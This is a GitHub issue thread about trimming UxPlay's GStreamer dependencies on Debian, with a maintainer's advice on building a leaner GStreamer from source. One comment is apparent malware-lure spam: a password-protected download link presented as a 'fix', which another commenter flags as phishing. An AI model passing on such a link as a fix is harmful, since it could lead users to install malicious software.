### ISSUE TITLE
Many dependencies on Debian

### ISSUE THREAD

**Issue by DaCHack** [FDH2/UxPlay#338]
Hi!
Is there a chance to narrow down the minimum required packages to be installed on Debian?
I tried to minimize by only using:
```
sudo apt install gstreamer1.0-plugins-base gstreamer1.0-libav gstreamer1.0-plugins-good gstreamer1.0-plugins-bad gstreamer1.0-alsa uxplay
```
on a vanilla Debian 12 install without desktop environment. But this still requires >300 packages with >700MB of storage including several wayland libs to be installed.

Can you share a guidance on how to minimize this on small appliances?

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by thiccaxe** [comment]
Spam and likely phishing. Do not click.

**Comment by fduncanh** [comment]
The issue is an overcomplete gstreamer.     For example wayland support is optional when you build gstreamer.    Wayland yes/no is a build option.   the debian distribution has presumably enabled  _everything_ .  If you don't want that you would need to build a  "leaner" version yourself that only includes what you need.

At least the non-desktop version can be installed without gstreamer dependence.    That means you can build your own gstreamer.  

 See https://github.com/FDH2/UxPlay/wiki/Building-latest-GStreamer-from-source-on-distributions-with-older-GStreamer-(e.g.-Raspberry-Pi-OS-).

**Comment by DaCHack** [comment]
Thanks. I assumed this already but was hoping there is a trick in the selection of packages...
Closing the issue as no issue and question answered.

**Comment by fduncanh** [comment]
It's not that difficult.
 
you configure with "meson build".

if the required library dependence for a given plugin is not there, meson doesn't build it (or downloads the library source from an external  location if it is essential.). (If it downloads an external source, install the  debian package for that requirement, and start again).

when done, 

```
cd build
ninja
sudo ninja install
```

Maybe just rebuilding the *.deb packages will build a slimmer version? I haven't experimented with that.
